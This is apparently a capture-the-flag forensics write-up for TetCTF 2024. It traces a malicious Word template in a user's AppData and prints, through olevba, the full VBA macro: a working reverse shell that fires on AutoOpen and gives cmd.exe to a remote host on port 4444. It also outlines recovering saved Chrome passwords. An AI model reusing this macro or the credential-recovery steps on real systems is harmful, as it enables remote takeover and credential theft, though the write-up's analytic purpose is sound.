We can quickly mount the .ad1 file using FTK imager, and we are presented with the user's AppData.
Basing off the description, we have two pieces of information.
User was in the process of registering for TETCTF (Reading the Rules)
Malicious code was downloaded onto the computer somehow
So we can start by looking for anything related to TETCTF first as that was how the malicious code got uploaded onto the computer.
Opening the Office Folder in Roaming, we see a suspicious .lnk file with the name TetCTF2024-Rules.LNK, suggesting that a docx was opened.
Looking at the templates directory, we recieve a windows defender error upon clicking on one of dotm files, indicating a possible malware dropper.
Using olevba to extract the macros, we get the C2's IP and Port as well as the first flag.
โโโ(kaliใฟkali)-[~/Desktop/Random_Shit/TETCTF-2024-20240126-203010]โโ$olevbaNormal.dotm--decodeXLMMacroDeobfuscator:pywin32isnotinstalled (only isrequiredifyouwanttouseMSExcel)olevba0.60.1onPython3.11.6-http://decalage.info/python/oletools===============================================================================FILE:Normal.dotmType:OpenXMLWARNINGFornow,VBAstompingcannotbedetectedforfilesinmemory-------------------------------------------------------------------------------VBAMACROThisDocument.clsin file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'---------------------------------------(emptymacro)-------------------------------------------------------------------------------VBAMACRONewMacros.basin file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'---------------------------------------'CoppyConst ip = "172.20.25.15"Const port = "4444"Const INVALID_SOCKET = -1Const WSADESCRIPTION_LEN = 256Const SOCKET_ERROR = -1Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As LongEnd TypePrivate Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As LongPtr ai_addr As LongPtr ai_next As LongPtrEnd TypePrivate Type STARTUPINFOA cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As String hStdInput As LongPtr hStdOutput As LongPtr hStdError As LongPtrEnd TypePrivate Type PROCESS_INFORMATION hProcess As LongPtr hThread As LongPtr dwProcessId As Long dwThreadId As LongEnd TypeEnum af AF_UNSPEC = 0 AF_INET = 2 AF_IPX = 6 AF_APPLETALK = 16 AF_NETBIOS = 17 AF_INET6 = 23 AF_IRDA = 26 AF_BTH = 32End EnumEnum sock_type SOCK_STREAM = 1 SOCK_DGRAM = 2 SOCK_RAW = 3 SOCK_RDM = 4 SOCK_SEQPACKET = 5End EnumPrivate Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long
Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long
Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As LongPrivate Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As LongPrivate Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long)
Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long
Function revShell() Dim m_wsaData As WSADATA Dim m_RetVal As Integer Dim m_Hints As ADDRINFO Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET Dim pAddrInfo As LongPtr Dim RetVal As Long Dim lastError As Long Dim iRC As Long Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512 RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData) If (RetVal <> 0) Then MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_family = af.AF_UNSPEC m_Hints.ai_socktype = sock_type.SOCK_STREAM RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo) If (RetVal <> 0) Then MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_next = pAddrInfo Dim connected As Boolean: connected = False Do While m_Hints.ai_next > 0 CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints) m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, ByVal 0&, 0, 0) If (m_ConnSocket = INVALID_SOCKET) Then revShell = False Else Dim connectionResult As Long connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen) If connectionResult <> SOCKET_ERROR Then connected = True Exit Do End If closesocket (m_ConnSocket) revShell = False End If Loop If Not connected Then revShell = False RetVal = closesocket(m_ConnSocket) Call WSACleanup Exit Function End If Dim si As STARTUPINFOA ZeroMemory si, Len(si) si.cb = Len(si) si.dwFlags = &H100 si.hStdInput = m_ConnSocket si.hStdOutput = m_ConnSocket si.hStdError = m_ConnSocket Dim pi As PROCESS_INFORMATION Dim worked As LongPtr Dim test As Long worked = CreateProc(vbNullString, "cmd", ByVal 0&, ByVal 0&, True, &H8000000, 0, vbNullString, si, pi) revShell = workedEnd FunctionPublic Function MAKEWORD(Lo As Byte, Hi As Byte) As Integer MAKEWORD = Lo + Hi * 256& Or 32768 * (Hi > 127)End FunctionSub AutoOpen() Dim success As Boolean success = revShell()End Sub'Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9
For the second part of the flag, there is two ways to go about it.
Using Strings (Cheesing)
Simply doing a strings on the raw file with the format Flag 2: gives us the flag.
Getting the chrome password and decrypting it (Intended)
The user states that he no longer remenbers anything about his account, suggesting we have to do some sort of password recovery from a browser
Looking at the .ad1 file, we can easily spot Google Chrome and its UserData file entry which we can use to extract chrome's encryption key.